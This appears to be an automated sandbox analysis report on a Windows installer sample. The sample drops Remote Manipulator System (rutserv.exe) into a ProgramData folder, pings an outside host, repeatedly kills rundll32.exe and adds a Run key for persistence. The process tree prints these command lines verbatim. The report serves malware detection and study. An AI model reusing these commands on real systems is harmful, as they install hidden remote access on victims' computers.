Analysis

  • max time kernel
    146s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    01-11-2020 10:30

General

  • Target

    ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe

  • Size

    4.9MB

  • MD5

    8817ae0956677b821ae053b7fff41968

  • SHA1

    a0e0577c501355b80f7d1240cf9b850598bc0730

  • SHA256

    ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb

  • SHA512

    0d0e7d149d7bf6217b9e169fbcb8a85460f8d20f1868b2ae6f686e2211f6cf6c2fa89831d72d8a34c4135252d5b99d48203cac58490c38411c98e9f0447c9883

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • JavaScript code in executable 3 IoCs
  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 100 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 104 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 443 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe
    "C:\Users\Admin\AppData\Local\Temp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Users\Admin\AppData\Local\Temp\is-MPQAC.tmp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-MPQAC.tmp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp" /SL5="$20158,4482184,721408,C:\Users\Admin\AppData\Local\Temp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:1240
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c ping -n 2 Ping-ip.hldns.ru|find "TTL="
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:776
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 2 Ping-ip.hldns.ru
          4⤵
          • Runs ping.exe
          PID:1724
        • C:\Windows\SysWOW64\find.exe
          find "TTL="
          4⤵
          PID:980
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /C ""C:\ProgramData\Immunity\install.cmd""
          3⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1624
          • C:\Windows\SysWOW64\reg.exe
            REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Host\Parameters" /f /v "notification" /t REG_BINARY /d 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
            4⤵
            PID:1520
            • C:\Windows\SysWOW64\timeout.exe
              TIMEOUT /T 3
              4⤵
              • Delays execution with timeout.exe
              PID:1124
            • C:\ProgramData\Immunity\rutserv.exe
              "C:\ProgramData\Immunity\rutserv.exe"
              4⤵
              • Executes dropped EXE
              • Checks computer location settings
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:324
              • C:\ProgramData\Immunity\rutserv.exe
                C:\ProgramData\Immunity\rutserv.exe -second
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:328
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1204
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1900
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1620
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1636
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1700
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1740
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1484
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1896
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1644
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:980
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:432
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1352
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1776
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:404
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:308
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1716
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1900
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1620
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1808
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1156
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:324
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:756
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1012
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1880
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:512
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1292
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:920
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1864
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1724
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:980
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:916
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1516
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1492
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1756
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1892
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:976
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1752
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1532
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1800
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:432
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:928
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:808
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1964
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1204
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1552
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1716
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1760
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1808
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:848
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:980
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:916
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1516
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1276
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:924
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:308
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:964
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1696
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1620
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:972
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:432
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:1708
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:1872
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              PID:1028
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              PID:1068
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:1320
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:1496
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              PID:1864
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:1636
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:1960
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:1500
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:916
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              PID:1516
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:1740
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              PID:924
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              PID:976
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              PID:1752
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              PID:1532
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:1200
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              PID:324
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:1096
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:832
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              PID:1880
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              PID:1136
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:1328
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:1320
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:1772
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:1808
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:848
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:980
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:1548
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:816
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:1492
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:1740
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:924
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              PID:976
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:948
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:1620
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              PID:972
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:432
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:340
            • C:\Windows\SysWOW64\timeout.exe
              TIMEOUT /T 9
              4⤵
              • Delays execution with timeout.exe
              PID:1872
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "nots" /t REG_SZ /d "C:\ProgramData\Immunity\rutserv.exe"
              4⤵
              • Adds Run key to start application
              PID:1516

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/324-20-0x0000000003F80000-0x0000000003F91000-memory.dmp

    Filesize

    68KB

  • memory/324-21-0x0000000004390000-0x00000000043A1000-memory.dmp

    Filesize

    68KB

  • memory/324-22-0x0000000003F80000-0x0000000003F91000-memory.dmp

    Filesize

    68KB

  • memory/328-512-0x0000000004CF0000-0x0000000004D01000-memory.dmp

    Filesize

    68KB

  • memory/328-467-0x0000000003EB0000-0x0000000003EC1000-memory.dmp

    Filesize

    68KB

  • memory/328-465-0x00000000042C0000-0x00000000042D1000-memory.dmp

    Filesize

    68KB

  • memory/328-464-0x0000000003EB0000-0x0000000003EC1000-memory.dmp

    Filesize

    68KB

  • memory/328-510-0x0000000004CF0000-0x0000000004D01000-memory.dmp

    Filesize

    68KB

  • memory/328-511-0x0000000005100000-0x0000000005111000-memory.dmp

    Filesize

    68KB